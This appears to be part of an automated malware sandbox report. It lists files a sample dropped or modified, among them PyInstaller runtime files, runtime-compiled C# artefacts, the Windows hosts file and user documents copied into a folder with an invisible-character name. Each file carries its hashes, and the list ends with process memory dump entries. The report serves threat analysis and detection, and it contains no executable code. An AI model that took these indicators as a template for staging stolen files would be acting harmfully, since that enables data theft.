MD5
ff62332fa199145aaf12314dbf9841a3

SHA1
714a50b5351d5c8afddb16a4e51a8998f976da65

SHA256
36e1c70afc8ad8afe4a4f3ef4f133390484bca4ea76941cc55bac7e9df29eefd

SHA512
eeff68432570025550d4c205abf585d2911e0ff59b6eca062dd000087f96c7896be91eda7612666905445627fc3fc974aea7c3428a708c7de2ca14c7bce5cca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI6522\unicodedata.pyd

Filesize
262KB

MD5
867ecde9ff7f92d375165ae5f3c439cb

SHA1
37d1ac339eb194ce98548ab4e4963fe30ea792ae

SHA256
a2061ef4df5999ca0498bee2c7dd321359040b1acf08413c944d468969c27579

SHA512
0dce05d080e59f98587bce95b26a3b5d7910d4cb5434339810e2aae8cfe38292f04c3b706fcd84957552041d4d8c9f36a1844a856d1729790160cef296dccfc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05jhhokc.k4m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fjat5xm4\fjat5xm4.dll

Filesize
4KB

MD5
16c412c4335a158c8d18ed2a73f6af95

SHA1
8ed32d37ba39aaaa2b5a08f170cabbe70960f3c3

SHA256
91b9990ae2dbd15e40e4211080bc047f5dd1f14d80e81f123c93ff0260534c0d

SHA512
d95738d15e745ed5653270f8d27999370610c5af9cdedbe840e32723e8dd4c8d8aabb52803738d585a84fdacd8ea27f41ed5d8b1bb2ea61223197faebe1e9872

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\BlockMove.mp3

Filesize
290KB

MD5
d1f7c8503fb7af31605fa26447878b4a

SHA1
a7ee389d3e9a199e984339bc3e7fb0d142b451e7

SHA256
552e3e3ac84c66ff500e91a0b91bf389687f936cf31e58dd1220dff729d9dcbf

SHA512
5815cb63184b0efbc008921917a052a4edfbb4ddecde3c23175c5c60b238cf8f250844beab4a9d3c48c15da8f37c377d3c33ed9074d406134b0069809e6ce55d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\ConvertPush.docx

Filesize
18KB

MD5
e3faffa5a000d7396e783e74577ebdca

SHA1
9e3dc3b9f600988b6cd10aaf00ea0fd9257f646b

SHA256
af69e5562a77f538ae32df10afabb0d1024d9e62131df7980891f6c436df9061

SHA512
5469ed07b89949bc8ccb4d9eda3d58ef2c5ae03f158b247a47ed4d3f7e6b602ea941430fd534e0dc73015897d0e56a7b3ac59cbcd54ae1dda60da80c443ad2b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\ConvertRevoke.jpg

Filesize
383KB

MD5
11aec6a0228d4b4552705d4c7b3ca2b2

SHA1
f73106b8d468f11b014fe6a56c6e28acf0b4071b

SHA256
1642895b708ca4b74e85e5c70b621a72a4879efc396ad4460842fa49da47fba3

SHA512
e0d0f25900b43d7a61b1af0768e4b2035a5de9f79e2fa62d15fc7682d8202ef53028bcd05fea7821cd294d54f7007e11e61faa5d1d8b33e038d24b1e51cc83a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\GroupBackup.mpg

Filesize
360KB

MD5
422bc5c98458b6abe351ba223b77a642

SHA1
fba015b1740164494a30f647c08df0c7844ab499

SHA256
3576991a3874a263ddc38836f5540c946a83bd8b31162cc333b389ed24e0b1f8

SHA512
a78318561c47fb6d25e70eefe0825d31325ff18ef9f93dae6b2cd49ef8f83540b6d9befdd8d0db2fed93c9fb08332b3c7e821b86e6f84240670ef986c09057cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\RequestAssert.mp3

Filesize
592KB

MD5
b1f4f24df601bc67b1e1446ecbd3467e

SHA1
aa71b304ee98e96caede89d3f93d4b27991610ef

SHA256
401ddb8eadf78044ebbdfdf8984729f304b422f258faf56098748b4953c0150d

SHA512
d6d111e97dea51f77ce98145fdae54df29412db0dc021abf33753504b3291f2bfb1264142279de832c35aa581e2e5a6fadad6128bb1960cbf94c42fca1607d17

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\ResolveMeasure.docx

Filesize
16KB

MD5
c2455837cea7e739271bb3901fea1bda

SHA1
9a02fb38a56e5901cd922350bf58b3ab7b4bd734

SHA256
14ae1cc564f02ecabc6ac595b57a67d07ddedfa0b29037416ea1c9a7eeb7456d

SHA512
7fee16613ac59f41317bb6837520409b14266dc8c18498e4eae31d37a705d328ddcf8049e19f8977313b40430f08e78445ee1bbbbd24d346417f15fef8947f02

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\SetSearch.docx

Filesize
18KB

MD5
c96076d43d5fc4495d8f5347d0c6445b

SHA1
f036f3ff7ab40a931e3c7df47bed6df680428d7b

SHA256
1da2eef2988ee6ef6c7d2897f512f08b73de9590aa15ecb9da6cd7f098c367ee

SHA512
a6acf21881dcf9af8cbe71a9f171546502ebd9ead7a3850355dfbddbc632219dc45ab3aa5bc4a7279a2438f4b96313381d24a4aed9bd0665c04fd70fce8ac03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\ConvertFromConnect.docx

Filesize
16KB

MD5
ce739b61676cb75be5fbb2ce6c169402

SHA1
7c4380358806090f49a8304011604c8a7c374461

SHA256
0a97ea0d67c6aa81f2d075d40383ac1d0c3c075701aa0516fed4005a1b9509c0

SHA512
b80382a532536fcf7909183b79abf7510deab95badcb4a7a397d0b2a3e053df2cab098a559b4f985d0d19098505d622d1ba7e43fa4ee855ada845c78e9c29117

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\ConvertRepair.xlsx

Filesize
176KB

MD5
2be5cc325783dd56989606479cf9fc10

SHA1
19dca6c1f87827988802e36d26069699b846f614

SHA256
41c885c7c945d63eaa26741a421db12824d066d58f5c27bfb5debe18b7743277

SHA512
c7cf56865727cc8f65b8d95dca05530a0b31ed79f319b4b3d0d2fd1596f3ccb596c35f92df42eb90409ec05555f42cc315eb0fcdffecbe16e65bddaeb2d50295

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\JoinPop.docx

Filesize
399KB

MD5
3d1176e00782a135f3652b9f659e4577

SHA1
9ee4e86bfcda144cca12bdc1d6637af1ac40b281

SHA256
226800952dff1ea83b5e2daceef01eb8a35c46cda3f307cb904044dac71c84fd

SHA512
ed39711f366cf08379a76d1ee39467a2fe52e9c6f02281a462d4824056eb513a205df9a3b1f80c9eb4da19fd33bb3c2c20230af64031a4e1854b475ecf8a6ff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\PushEnter.doc

Filesize
185KB

MD5
17628602420e5f3833cbd720803be967

SHA1
e510bcaf06718ba51e3f7a93e87a6a109f9b9611

SHA256
8f3995232fd0288dfd1087093a5745578e98c2425e1126c9477b652661926a09

SHA512
12e4f089c44cffe2d9b511e932d7590a5a9dd348d133953bdbc3a5a8eba7bd73491439d8430665ceaeef371c1c2eba26db81c4d0e1355035b8f8fb60d7de5cc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\ReceiveConfirm.xls

Filesize
275KB

MD5
2e56c66296c51711fe7931bc8d574084

SHA1
013cef093c39a4a01c3d5ff8994d3f5bba02779a

SHA256
a5c7bfaa2689cced3d396f23c63912e30540851ee28b11680390785bfb7eae42

SHA512
2f21783fc4e98416aa26594290291f1abc5a45a7aaae6ea6441f8aa74c9ece2084c7e147a29988682f1ec0b9ffa864c0ad310730c508efd0f4b4334507403cfe

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fjat5xm4\CSCA6BDC6CD97A04BCDB29EE4288C666367.TMP

Filesize
652B

MD5
9ea4fd26d7397cec471f4fb1ec4d6f5f

SHA1
1f9ccfdb2bf4d49fc57e24bfcbcbf7b85b91a04e

SHA256
a8441613b973a7ee1b3d03224ec0142a6dbcc01c721c40bd8aab56a9d18148f9

SHA512
65a675556979808494a2cfece12f05dcacd7597f22d3732f636da7d84d43826195106448d0b9c76bddbae8ab17b0b5e14c0bc8dadeb61d4669dd61772b2bf3aa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fjat5xm4\fjat5xm4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fjat5xm4\fjat5xm4.cmdline

Filesize
607B

MD5
e32d37150090fbfc9938f91e3cff512e

SHA1
828fbe24d044b521d707e51b23bfbfd98c0ffd5c

SHA256
4e5fc1fcda639445cef9d00aba53118a0a98a78417857d6bcf7cfbfb21f14c26

SHA512
e12d12dd5046e3ac119a2178d507cd0f67f62253a2939a7c217fa678fb449f61cb450aba470b4a15b90aae109429ea40383bb30d47fbdd9d150969688e8a911e

Download Submit
memory/904-67-0x00007FF82C7D0000-0x00007FF82C803000-memory.dmp

Filesize
204KB

Download
memory/904-342-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp

Filesize
6.4MB

Download
memory/904-76-0x00007FF82C4D0000-0x00007FF82C4E4000-memory.dmp

Filesize
80KB

Download
memory/904-62-0x00007FF82C8C0000-0x00007FF82C8D9000-memory.dmp

Filesize
100KB

Download
memory/904-104-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp

Filesize
1.5MB

Download
memory/904-48-0x00007FF835430000-0x00007FF83543F000-memory.dmp

Filesize
60KB

Download
memory/904-81-0x00007FF81C200000-0x00007FF81C2B3000-memory.dmp

Filesize
716KB

Download
memory/904-359-0x00007FF82C8E0000-0x00007FF82C90B000-memory.dmp

Filesize
172KB

Download
memory/904-79-0x00007FF831270000-0x00007FF83127D000-memory.dmp

Filesize
52KB

Download
memory/904-74-0x00007FF831020000-0x00007FF831047000-memory.dmp

Filesize
156KB

Download
memory/904-64-0x00007FF8352B0000-0x00007FF8352BD000-memory.dmp

Filesize
52KB

Download
memory/904-286-0x00007FF82C7D0000-0x00007FF82C803000-memory.dmp

Filesize
204KB

Download
memory/904-60-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp

Filesize
1.5MB

Download
memory/904-289-0x00007FF81C2C0000-0x00007FF81C7F3000-memory.dmp

Filesize
5.2MB

Download
memory/904-290-0x0000019C52AD0000-0x0000019C53003000-memory.dmp

Filesize
5.2MB

Download
memory/904-73-0x0000019C52AD0000-0x0000019C53003000-memory.dmp

Filesize
5.2MB

Download
memory/904-72-0x00007FF81C2C0000-0x00007FF81C7F3000-memory.dmp

Filesize
5.2MB

Download
memory/904-71-0x00007FF82B770000-0x00007FF82B83E000-memory.dmp

Filesize
824KB

Download
memory/904-66-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp

Filesize
6.4MB

Download
memory/904-92-0x00007FF82C810000-0x00007FF82C835000-memory.dmp

Filesize
148KB

Download
memory/904-25-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp

Filesize
6.4MB

Download
memory/904-360-0x00007FF82E7D0000-0x00007FF82E7E9000-memory.dmp

Filesize
100KB

Download
memory/904-288-0x00007FF82B770000-0x00007FF82B83E000-memory.dmp

Filesize
824KB

Download
memory/904-58-0x00007FF82C810000-0x00007FF82C835000-memory.dmp

Filesize
148KB

Download
memory/904-56-0x00007FF82E7D0000-0x00007FF82E7E9000-memory.dmp

Filesize
100KB

Download
memory/904-54-0x00007FF82C8E0000-0x00007FF82C90B000-memory.dmp

Filesize
172KB

Download
memory/904-31-0x00007FF831020000-0x00007FF831047000-memory.dmp

Filesize
156KB

Download
memory/904-307-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp

Filesize
6.4MB

Download
memory/904-313-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp

Filesize
1.5MB

Download
memory/904-358-0x00007FF831020000-0x00007FF831047000-memory.dmp

Filesize
156KB

Download
memory/904-357-0x00007FF835430000-0x00007FF83543F000-memory.dmp

Filesize
60KB

Download
memory/904-78-0x00007FF82C8E0000-0x00007FF82C90B000-memory.dmp

Filesize
172KB

Download
memory/904-370-0x00007FF81C200000-0x00007FF81C2B3000-memory.dmp

Filesize
716KB

Download
memory/904-369-0x00007FF831270000-0x00007FF83127D000-memory.dmp

Filesize
52KB

Download
memory/904-368-0x00007FF82C4D0000-0x00007FF82C4E4000-memory.dmp

Filesize
80KB

Download
memory/904-367-0x00007FF81C2C0000-0x00007FF81C7F3000-memory.dmp

Filesize
5.2MB

Download
memory/904-366-0x00007FF82B770000-0x00007FF82B83E000-memory.dmp

Filesize
824KB

Download
memory/904-365-0x00007FF82C7D0000-0x00007FF82C803000-memory.dmp

Filesize
204KB

Download
memory/904-364-0x00007FF8352B0000-0x00007FF8352BD000-memory.dmp

Filesize
52KB

Download
memory/904-363-0x00007FF82C8C0000-0x00007FF82C8D9000-memory.dmp

Filesize
100KB

Download
memory/904-362-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp

Filesize
1.5MB

Download
memory/904-361-0x00007FF82C810000-0x00007FF82C835000-memory.dmp

Filesize
148KB

Download
memory/1496-261-0x000002DD3B950000-0x000002DD3B958000-memory.dmp

Filesize
32KB

Download
memory/2500-82-0x0000028AB71D0000-0x0000028AB71F2000-memory.dmp

Filesize
136KB

Download